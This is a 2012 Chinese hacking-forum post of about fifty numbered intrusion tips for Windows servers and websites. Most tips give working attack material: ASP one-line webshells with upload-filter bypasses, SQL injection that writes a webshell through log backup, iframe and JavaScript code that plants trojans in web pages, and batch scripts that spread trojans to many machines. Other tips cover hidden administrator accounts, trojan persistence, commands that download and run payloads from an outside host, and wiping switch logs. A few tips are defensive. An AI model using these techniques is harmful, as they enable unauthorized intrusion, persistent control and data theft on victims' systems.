中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,3 V; p9 l& H$ g  g# p( Q
cacls C:\windows\system32 /G hqw20:R
8 i* v+ w7 ^  \9 P思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* p7 s: U' @' g恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
+ M7 S% o& e- a! R+ O4 Z1 r) d5 T$ ~) D( r% k- G' s
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。* |0 R1 b' J/ w6 U8 z

- m* w& f5 ?: z; g3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" h0 L  X* C+ v/ m7 `
# W' z; G( `& i' k+ G. i4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- S: h4 J8 l2 [- G/ u
4 K! H" B0 w% F8 Z5、利用INF文件来修改注册表
! m! h% @5 f4 ^5 t[Version]% n, G; I/ O* _$ ?9 t# x! x/ ^
Signature="$CHICAGO$", y  }7 e8 z, a6 ~; D) X# ^) a5 Q
[Defaultinstall]4 g8 y0 }3 t: ^. s$ u
addREG=Ating
, ~1 g; T$ Q& T( ][Ating]4 l; B6 S8 l4 {
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- _& f6 j1 \' I9 I3 |7 S以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:+ z2 v& `) M1 w1 Q8 u$ z- e
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
6 E/ M# }  B$ f  d" k其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- Q; \+ R! i* E; ^0 hHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU: i# `" R# }; P7 Q, Y
HKEY_CURRENT_CONFIG 简写为 HKCC- b# l6 n  b9 h3 b6 }8 N
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 O; M+ D* U; G# T1 S# x"1"这里代表是写入或删除注册表键值中的具体数据
* V. Z  q5 }+ H3 f" f8 f7 c* _5 M$ C# [) H' e  k+ u
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,- m" x- c( N% M' r: J
多了一步就是在防火墙里添加个端口,然后导出其键值0 q- ?# j3 M9 z& K+ _$ ]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]5 L0 B: E- Y: D5 ~
' A' r. V  ]6 D( @8 C' @
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ X  I+ p1 a; g/ H
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- p9 R+ M( K+ P# r5 F: k
' T2 c, q; M; Y5 O$ B, P
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。0 k! N- F: |% K; }9 t: F. w+ ]0 D+ y
& ?7 U; z. q' d0 D: j
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ ]7 f. h* \. ?" z: s/ K
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。! A% T2 D2 E$ i

8 P# k# A4 e! F2 z& Y( c10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
2 [% m* H) I0 j) V* h) E+ q% o
% x  O, {* J0 K* E) E11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 R8 P( J4 J$ t1 {9 g用法:xsniff –pass –hide –log pass.txt$ f' R) `7 T. F

1 J5 y$ Q) a- e. D2 E- K12、google搜索的艺术0 y+ x" L. L; e) ^! Y$ f
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
) D% q7 E" z+ I+ }9 z: I% k2 ?或“字符串的语法错误”可以找到很多sql注入漏洞。/ p- F5 [  s; ^. D/ K, n+ D

8 T5 y( P2 _; ]/ Q13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。3 t1 e7 @/ M( v! T

7 K7 I4 l3 Q3 p, `14、cmd中输入 nc –vv –l –p 1987
% F' z) w7 \& u" \1 |8 K- S( g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 h) m* \& i) t/ k0 U- x
6 V- r! C% U9 p  }$ N& }" E& H15、制作T++木马,先写个ating.hta文件,内容为$ U5 h3 S" ^8 O, C
<script language="VBScript">1 G, r4 U! s: h
set wshshell=createobject ("wscript.shell" )
; R# V) G- Z$ Q# ]a=wshshell.run("你马的名称",1): w0 _; |' N, _* @; ?2 m, [) S7 W
window.close
) N  U8 M: u9 z( v6 a: {# D( a! v</script>
& n! u5 O3 Q: v5 w+ T! B' y再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ W- p$ f9 k: z7 d7 ]. j$ q& d0 ~- H3 _& s9 m$ W" K
16、搜索栏里输入- x( l: C( p$ ?, [5 P5 H: [
关键字%'and 1=1 and '%'='
5 x) @9 d- H  R7 w, _关键字%'and 1=2 and '%'=') S/ y" u, L5 B
比较不同处 可以作为注入的特征字符1 k- n* n* v7 G+ E; A& r

' ?' G7 [( o& s( O17、挂马代码<html>
5 i. u0 d" l% D' v<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>4 s4 y  q% z6 o8 n
</html>
& i9 M2 B; Q5 Q  \# p0 \0 u: ^/ R5 C9 ?9 n' O0 d; w
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
/ w- S" g. \9 d; |8 znet localgroup administrators还是可以看出Guest是管理员来。9 A& E- n* V$ a

: x5 j- x) w6 M19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* n3 P& ^' r6 X# J5 M, w用法: 安装: instsrv.exe 服务名称 路径5 H# F, Q/ R" M
卸载: instsrv.exe 服务名称 REMOVE
5 B& W$ b: w/ a$ N+ w" M/ l1 m9 g7 a1 ^( T! P

8 p( F8 k! v& E21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
) R& ^; q7 J9 b# f* t! b! l6 @- H, R不能注入时要第一时间想到%5c暴库。
* i- c) v6 k4 p" N4 X& @& G: h2 G$ K( Z& F- ?
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
, E  h8 K  a7 Q2 V- I
/ t5 M2 N2 v/ X. t# s23、缺少xp_cmdshell时' m- i) z8 c" Z8 t- S2 A5 |4 F8 B
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 k- V- E. K8 C6 _1 k假如恢复不成功,可以尝试直接加用户(针对开3389的)0 G5 Z8 Y8 s& y$ K% C1 b+ j) z
declare @o int
; K# X; ~9 b- R0 O* W$ {- Texec sp_oacreate 'wscript.shell',@o out8 q' C! @& K  s+ J, R" s
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) R" d8 W- M. ?+ w3 M1 m& f
8 X( D/ r& o2 Y24.批量种植木马.bat
' o& v2 V# T* ?" J, \for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
' C) R* F, C1 G% P2 r. M2 r* }for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间! J- `9 @+ W/ Q+ `0 s
扫描地址.txt里每个主机名一行 用\\开头
8 i; l+ O2 a" ?& _4 C: G
1 K# M& p! s) H- X5 J6 _25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
; M* f/ E4 a) v9 a( j
% m+ j/ P% G: _: }1 h! |26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名./ ]$ g3 A1 G; v7 h
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
4 J; X, V- c( w# y/ \.cer 等后缀的文件夹下都可以运行任何后缀的asp木马/ C0 }5 \/ Y3 X/ k5 T  m( {* y( ?

/ X" I' b! @. l% ?$ D& x" |1 j27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
: Y* ~( L' i! {  b& M0 i然后用#clear logg和#clear line vty *删除日志( v+ m2 l1 F. q+ P" B% R
/ W9 O% L; T( ~$ y# k* h) Z
28、电脑坏了省去重新安装系统的方法
3 ~5 r7 X0 D# v纯dos下执行,! x4 h! g' q4 q5 a
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config/ a" r3 U- J$ v6 g( v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
& ]6 g8 \$ E( C1 y; Y2 O, |, ]& E
4 {. ]; @# k2 y" d* J: d, z# h29、解决TCP/IP筛选 在注册表里有三处,分别是:
7 U0 @% D, ], y6 U% @, MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; o4 K7 t8 U' O7 l% nHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" i1 B* C5 Z9 g+ Q/ C9 h$ s' Y& w
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- G* ?, K* `9 b9 m1 ]分别用
$ _  p5 o7 ?0 L. qregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* A3 R5 W4 A3 G' D. K
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 W- X1 H8 w1 u& rregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: A1 A% H6 z8 a, G# J- m6 s/ F命令来导出注册表项: k0 t4 V) t6 D3 }; m0 ^7 \
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% j( b- M- v+ f0 }4 V( g
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: S# j5 x$ _8 C- k: c
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 j9 h' C7 G( c- l* g+ [  ?5 v' r& K# f7 z3 E3 c& J
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- Y3 _# w) t9 h* E& g
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的36 X( @1 Q$ @1 g# D
, i; \6 W6 d3 g5 ^8 r
31、全手工打造开3389工具
4 H1 R1 B9 q' d! L% x' g) m8 C8 z1 ^打开记事本,编辑内容如下:
/ A" B, t9 C  D3 \1 Recho [Components] > c:\sql
$ w+ J! o4 ~! }5 ]1 Y, iecho TSEnable = on >> c:\sql5 j  ^2 z8 }- A, K7 f
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
4 D/ t- e' d, W. E9 L4 V% H编辑好后存为BAT文件,上传至肉鸡,执行
! w' U5 y+ ?: g% U6 Y  K, P9 D+ F$ j4 C2 A
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马- W% F/ q5 \- U

  t5 Z  `( g  ~: U' _4 f33、让服务器重启& m& }6 d" W2 p
写个bat死循环:
2 U6 k" n2 u7 C) T" \% I@echo off
" D4 b& o# x" J2 C, D" f:loop1$ l( m( {" ~5 Y. N( m
cls
- O" f2 Q9 @& V7 X5 w! estart cmd.exe2 Y6 l+ _7 h6 s: \/ }% ]! O- \
goto loop1
/ Y( b8 r& \- m& ]) p; r保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启, Z3 E( S0 R" |

) T$ r, K9 X( v& f# ^& [2 e34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
0 b" ?! Y# ^) I( @. M0 r% `3 D6 R: S@echo off$ v8 E: d( D8 Z, m0 Q
date /t >c:/3389.txt
1 C. e, Z" K% i7 o* e- L9 x0 b6 Mtime /t >>c:/3389.txt
: }- v- t5 Z* P6 f! [3 Uattrib +s +h c:/3389.bat
+ G+ Q* G) M8 A$ v1 uattrib +s +h c:/3389.txt
  D1 H, ]$ X- `% r6 Gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 c8 J* }" p5 ~# ?' X( t' x% S" m+ T并保存为3389.bat
9 K) b7 X7 n8 o! d打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
% y( `7 T  `* g3 m5 y6 h& W/ z# W! [) L# v* Q
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 M' e! {1 r2 Z& D0 @5 m' ostart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)8 f9 D. k  g- ~* J. g+ G( F
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
& _/ ^" `+ L! G- p# i( B6 X8 |9 c# U7 \9 p' E. G
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件0 n. Y( a) e5 S$ c) B
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 A' G5 b  H. z  ]echo 你的FTP账号 >>c:\1.bat //输入账号
) Z0 q- D' |" j* o$ }5 `echo 你的FTP密码 >>c:\1.bat //输入密码; q, |( P1 F& {6 v
echo bin >>c:\1.bat //登入4 b' K. y6 G' t
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
) \1 X0 m. K" t* W( Z7 M, F" Z. Iecho bye >>c:\1.bat //退出
7 g1 L6 ^+ Z7 u- \* B/ L然后执行ftp -s:c:\1.bat即可% N/ ]: Q1 A# a) Z; N4 S
  {3 M7 J. q5 G2 w+ [
37、修改注册表开3389两法5 C8 N$ w$ z! X1 g1 I
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- p5 s: G- X+ }6 U6 o1 e& |
echo Windows Registry Editor Version 5.00 >>3389.reg/ L' ?' A9 J+ ~7 q, U+ i& r" B; C" F
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
+ v) s& v' B  v5 w# Jecho "Enabled"="0" >>3389.reg
+ z. P% U% c9 Q+ r) F  D2 C8 ?' Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows' X: M) Q" T% v5 n* R, U
NT\CurrentVersion\Winlogon] >>3389.reg7 \+ z' V6 Z" t
echo "ShutdownWithoutLogon"="0" >>3389.reg
- y6 K& @, v$ d: iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]: R+ o) r5 \7 S' l
>>3389.reg- i! ~, Y8 V9 m. A5 U
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg% B2 N. H0 p& P: d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]$ M2 c2 X( I' a' e# \: _
>>3389.reg
7 h9 W2 x  I/ a. p& _echo "TSEnabled"=dword:00000001 >>3389.reg3 V  s7 F7 x  ?9 [/ v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
' M; n6 ~5 q( e8 fecho "Start"=dword:00000002 >>3389.reg0 w; \) O* o3 E2 h# \9 p3 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& d  T5 F) ]5 b( I>>3389.reg
- w+ R. v/ r7 `6 f- Recho "Start"=dword:00000002 >>3389.reg4 p8 y" q) V9 I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg4 E+ z2 ^: ^; y1 N2 ~; l
echo "Hotkey"="1" >>3389.reg% t2 |4 p1 H' f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# L( j  x+ d2 E4 q$ Q& E- h/ c9 a- `5 ^
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
6 W4 z. {- P, v0 o$ Z# J6 |echo "PortNumber"=dword:00000D3D >>3389.reg
+ Z. z3 p! y( ^' n* J; ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 {2 g2 C! a$ Z
Server\WinStations\RDP-Tcp] >>3389.reg* z0 U, ]' d3 }. O) o
echo "PortNumber"=dword:00000D3D >>3389.reg
% g7 y0 m5 B/ m1 m+ u把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 F; R6 M- B$ s$ f" l. }(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- [3 _+ D; v% v" {6 D( J! c0 }- B因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" D, t8 J* [* a: r, L5 E
(2)winxp和win2003终端开启1 j1 X& `$ E- Z3 d# a' \3 U
用以下ECHO代码写一个REG文件:
" V& D4 [: t- cecho Windows Registry Editor Version 5.00>>3389.reg
9 I6 K0 P! y4 E0 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- ^3 {9 F2 E7 j! D' lServer]>>3389.reg4 {$ Z# r2 o) C" e0 l6 z
echo "fDenyTSConnections"=dword:00000000>>3389.reg
" w1 Y/ S- L2 G0 t# mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 `$ ^: k2 v8 ^/ w
Server\Wds\rdpwd\Tds\tcp]>>3389.reg# }0 [# H- b" y8 m( R. I
echo "PortNumber"=dword:00000d3d>>3389.reg
/ f* ~9 s% |4 c( S9 techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 t' j; r* R) V6 X% p; W
Server\WinStations\RDP-Tcp]>>3389.reg
2 `8 x* ?; x! C1 Q6 Qecho "PortNumber"=dword:00000d3d>>3389.reg/ i1 q) u' Z6 \' ?  C' j
然后regedit /s 3389.reg del 3389.reg& p- B8 [7 F; X$ z& }
XP下不论开终端还是改终端端口都不需重启
0 F8 a' V2 E3 D  |! c4 F6 Q7 H3 L
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 {% |; a$ n4 y+ W1 }用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! z7 L+ r3 c7 U) w& O5 f- D3 f" u1 P* d1 r0 a) y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!1 y- K8 u5 ?( \* f1 h$ @
(1)数据库文件名应复杂并要有特殊字符
6 b. R1 ~. V- N! p(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ j: y0 e; o) q2 N- f( A% R* `将conn.asp文档中的
  H) b- Y8 }% I) U7 }DBPath = Server.MapPath("数据库.mdb")
: f: `4 k% ?) M$ }6 k0 Dconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath  L! t' F% s- ?' c
# ^! q% K1 u4 b9 u
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置* V6 V9 H4 ~+ u+ D) o  ?
(3)不放在WEB目录里7 X0 b4 k3 ?9 w: z

: R" }3 Z- ]; d40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 f( x) X, k; Y. G' \8 h6 I
可以写两个bat文件
) K/ E- d2 D  d  c- R) m# U@echo off6 O: P9 J" b" c5 J- P
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe% j# X( J+ O2 n3 H
@del c:\winnt\system32\query.exe
7 P7 y: ]0 Q$ V; l( z@del %SYSTEMROOT%\system32\dllcache\query.exe! g% n# A0 n0 m* n: z2 a* _
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
# {2 \0 [/ _" H( r5 m  e- Z
% c% X# t1 q1 y0 [  P, q@echo off
5 `% ^6 A$ d, n% s+ c4 I@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe3 r2 l( f0 ]- ?  x& Y9 V
@del c:\winnt\system32\tsadmin.exe) a9 Y5 ]: h$ h$ n
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex  ^2 \2 d$ g% ?( C

# ]5 W3 Y, `* ~5 B# h3 R# w+ g, ]" o( J41、映射对方盘符8 C  V! R: e. M4 M7 i" Z" M4 ~. U
telnet到他的机器上,
% X8 Q" D9 X( t% i1 t$ f$ f+ {+ j2 ^net share 查看有没有默认共享 如果没有,那么就接着运行5 J8 T5 X5 j4 q: _7 ?
net share c$=c:
. P& z* U" V  qnet share现在有c$6 b: G, W- n/ g& \
在自己的机器上运行+ @; h4 a; K$ f  t" D: z7 c$ d
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
5 G1 p4 V, A: Q& C4 M) X1 @# |  ~7 o# u
42、一些很有用的老知识
0 G7 T: B- G, T# O1 L! j6 g( Ptype c:\boot.ini ( 查看系统版本 )/ f5 C8 p; J; I, e
net start (查看已经启动的服务)
) C7 D8 v  g+ D0 mquery user ( 查看当前终端连接 )
0 f* l0 \) x0 {0 `8 n# Nnet user ( 查看当前用户 )8 D" ^! O- J1 {; r% V# N
net user 用户 密码/add ( 建立账号 )9 a+ P7 T7 r  Y, R
net localgroup administrators 用户 /add (提升某用户为管理员)
4 P! M& ~/ I4 c! p5 w4 \/ Qipconfig -all ( 查看IP什么的 )) C4 N6 I5 I# u1 E, p+ g
netstat -an ( 查看当前网络状态 )
& k4 ^. e4 W0 d) v# \( M2 rfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
  b: d: I7 M& _2 H  E3 ]4 C' T& Y克隆时Administrator对应1F4; j6 O8 u0 B* u+ w4 K- N2 s0 s" {7 H
guest对应1F5+ D/ ?- J6 B8 `/ ?) j
tsinternetuser对应3E89 U& V/ T* e* q1 W/ A; M

3 m- ?7 N, F/ ~6 w43、如果对方没开3389,但是装了Remote Administrator Service
, T% A9 i% u4 Z, o) P1 v8 s; R用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 m& }0 o1 R6 U3 Q( k! u解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- Q' L1 X4 [( z! N- W) a1 n- t先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
: ]! m( y! _4 F4 G, {# t" [" w7 \) l7 |  I, e" Q' V' |0 h
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ y' W. J$ `7 d  ?+ {  {. W8 Q- E5 I本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)9 ]; {7 `5 Y- E7 ]' C$ [( K- Y2 `
2 `- ]2 z& _% N' h
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)% w3 W2 J+ h/ `
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 ]+ \9 L7 q. G! L/ z* Y^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =/ x! o5 l6 L2 ~( }' \2 X+ a
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
  ?  ]" L% s0 X, ^- K2 u1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs3 O7 v( L8 E/ s+ t4 M: x
(这是完整的一句话,其中没有换行符)
+ O+ s6 D) B$ ]然后下载:( ?  d4 u% i9 C( t1 \
cscript down.vbs http://www.hack520.org/hack.exe hack.exe) J9 t5 b5 H% ?) B& q* w- j

; q( g9 g( a# V  |46、一句话木马成功依赖于两个条件:  D# n/ _  f3 U, _# l( ~; J
1、服务端没有禁止adodb.Stream或FSO组件  ^. ~, d7 ?% F
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。7 o5 a) n# {6 `7 E3 T$ l7 }

0 O# o2 v+ V8 B; Y$ z7 S+ x47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' s' i# n6 {( W;alter database utsz set RECOVERY FULL--% ^( [% A9 A& A$ G0 |1 U4 z6 n
;create table cmd (a image)--
2 k7 a3 T6 W8 @7 l! m3 S/ X0 g;backup log utsz to disk = 'D:\cmd' with init--! d5 W# o& j! v) S: G/ J9 b1 ?
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# }1 u. `, @: R! J  b: R;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 ]( B- p7 |# U) b$ O5 y注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( I8 G0 g- A( a* o. @8 v8 e

( @2 z2 b/ I& k+ {48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ T: H! D  j/ _# J! k
! C. p* X7 v/ b; ^! M
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 Y( X! Y$ z4 O8 t所有会话用 'all'。
0 M' s4 n' H. g/ ^# E& }) Y-s sessionid 列出会话的信息。
( ?8 I/ p0 v8 s0 o9 D-k sessionid 终止会话。
% q! P/ K0 s/ s-m sessionid 发送消息到会话。
. c6 w2 p/ O; B( `) c8 N; F' A# I0 I' m) @
config 配置 telnet 服务器参数。
& G7 `. L* z  }% }3 i
! \' @. o# L4 z4 A5 a4 K+ ]( C" Ccommon_options 为:5 \" e. j0 M% E
-u user 指定要使用其凭据的用户
7 Y) V3 e6 E8 v3 R. J* M( H/ C* d3 n1 z-p password 用户密码
9 U2 s! ]" M$ Z! C
/ Y5 f9 \0 e1 h8 x1 fconfig_options 为:
; R. g2 K2 @' y! W# z, mdom = domain 设定用户的默认域/ L, c0 }2 Q9 J8 f6 G: R
ctrlakeymap = yes|no 设定 ALT 键的映射! k' \0 q3 _  V
timeout = hh:mm:ss 设定空闲会话超时值
" M6 H( N4 Z9 V: }- E2 p9 Ftimeoutactive = yes|no 启用空闲会话。
; D; t9 r, e: u+ u2 f. g" G! jmaxfail = attempts 设定断开前失败的登录企图数。% T0 D6 S, ~6 A# ~* S
maxconn = connections 设定最大连接数。& c! Q  N2 S0 R3 r
port = number 设定 telnet 端口。5 |% A2 j7 h) q# ~6 w& e
sec = [+/-]NTLM [+/-]passwd9 F" ]* Q$ J3 j" a# L+ w
设定身份验证机构4 I* R  U* K: `$ w8 \: r4 ?
fname = file 指定审计文件名。6 z* s8 V% S8 n
fsize = size 指定审计文件的最大尺寸(MB)。: \* \- F- W2 i, u, @+ o
mode = console|stream 指定操作模式。$ M) f5 W6 Y/ x
auditlocation = eventlog|file|both+ S' I' ^6 X; Y* X/ i. p8 w
指定记录地点: n; m1 E. m' g8 l, i
audit = [+/-]user [+/-]fail [+/-]admin
& Z; G8 w- k! S4 _, r) c, c1 G1 p, @
49、例如:在IE上访问:
1 b6 g: I! f' T& ]8 Wwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
1 U  F7 o' O* }& J1 Rhack.txt里面的代码是:3 f( M% r3 V  g) E) C1 ?' B: @
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
8 I7 K6 Z% f3 n2 r% ?把这个hack.txt发到你空间就可以了!
  V6 t& J  x1 U' ^  m/ K7 c( u/ ]8 ^这个可以利用来做网马哦!( r( m' r. O- I* C$ `4 |

- u9 }) y2 A' Y0 Q5 h9 Z9 ]50、autorun的病毒可以通过手动限制!" K+ c& A* I! |; H
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
, N  v; t9 Q- {" X2,打开盘符用右键打开!切忌双击盘符~
2 a. L% C4 Q5 M5 N1 d/ c. J3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
. o* R8 y1 K/ w* {1 D4 A0 ~5 r% A- [8 n9 b  l6 C4 `
51、log备份时的一句话木马:
. E) H5 ?0 [( K8 H" y6 pa).<%%25Execute(request("go"))%%25>* c- |! a9 ]" b% Y: A
b).<%Execute(request("go"))%>; n1 X& U4 i  _
c).%><%execute request("go")%><%4 S, n$ s2 I0 D/ R% x# h, U% m$ i3 h
d).<script language=VBScript runat=server>execute request("sb")</Script>
7 n: m& C0 n- I0 k1 q9 r! je).<%25Execute(request("l"))%25>
/ W+ \  ?, y; E& wf).<%if request("cmd")<>"" then execute request("pass")%>
4 l! P) k$ w7 Y+ F+ _
